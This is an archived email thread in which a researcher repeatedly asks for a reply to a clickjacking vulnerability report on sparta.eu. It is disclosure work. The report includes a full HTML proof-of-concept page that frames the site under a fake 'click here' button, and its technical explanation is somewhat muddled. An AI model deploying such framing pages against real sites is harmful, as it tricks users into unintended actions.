7 Jul
2022
7 Jul
'22
9:12 p.m.
Hello Team,
Please give me response regarding this issue please
On Tue, Apr 5, 2022 at 4:56 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
Hello Team,
Please give me response on this issue
On Tue, Mar 1, 2022 at 9:26 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
> sir any update?
>
> On Sun, Nov 22, 2020 at 8:16 PM Sakshi Patil <sakshipatil017(a)gmail.com>
> wrote:
>
>> *Vulnerability Name : Click jacking*
>>
>> Target URL:https://www.sparta.eu/
>>
>> Vulnerability Description :
>> Click jacking (User Interface redress attack, UI redress attack, UI
>> redressing) is a malicious technique of tricking a Web user into clicking
>> on something different from what the user perceives they are clicking on,
>> thus potentially revealing confidential information or taking control of
>> their computer while clicking on seemingly innocuous web pages.
>>
>> The server didn't return an X-Frame-Options header which means that this
>> website could be at risk of a click jacking attack. The X-Frame-Options
>> HTTP response header can be used to indicate whether or not a browser
>> should be allowed to render a page in a <frame> or <iframe>. Sites
can use
>> this to avoid click jacking attacks, by ensuring that their content is not
>> embedded into other sites.
>>
>> Typically there is one type of attack - cross site request forgeries
>> (CSRF) that can interact with functions on other websites.
>>
>> 1) This vulnerability affects Web Server.
>> <html>
>> <head>
>> <title>Clickjack test page</title>
>> </head>
>> <style>
>> #myBtn{
>> z-index: 999;
>> position: absolute;
>> top: 100px;
>> right: 50px;
>> color: white;
>> background-color: red;
>> }
>> </style>
>> <body>
>> <!-- <h1> A Sample Test Page </h1>
>> <p>Website is vulnerable to click jacking! </p>
>> <p>Avoid random clicks </p> -->
>> <div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%;
>> height:70%">
>> <iframe src="https://www.sparta.eu/
>> "frame1" width="100%"
>> height="100%" >
>> </iframe></div>
>> <div align="right" style="position:absolute; top:1; left:0;
z-index:1;
>> width: 70%;height:60%; text-align:left;">
>>
>> <a href="https://www.sparta.eu/
>> "target="_blank"><button id="myBtn"> click
here</button></a>
>> <!-- <a href="https://www.sparta.eu/
>> "><button id="myBtn">Open Modal</button></a>
-->
>> <div id="myModal" class="modal">
>> <!-- Modal content -->
>> </div>
>> </body>
>> </html>
>>
>> 2.save it as <any name>.html eg s.html
>>
>> 3.and just simply open that..and click on button(direct login) its
>> redirect https://www.sparta.eu/
>> As far as i know this data is enough to prove that your site is
>> vulnerable to Click jacking.
>>
>> Impact:
>> Attacker may tricked user, sending them malicious link then user open it
>> clicked some image and their account unconsciously has been deactivated .
>>
>> Attachment:
>>
>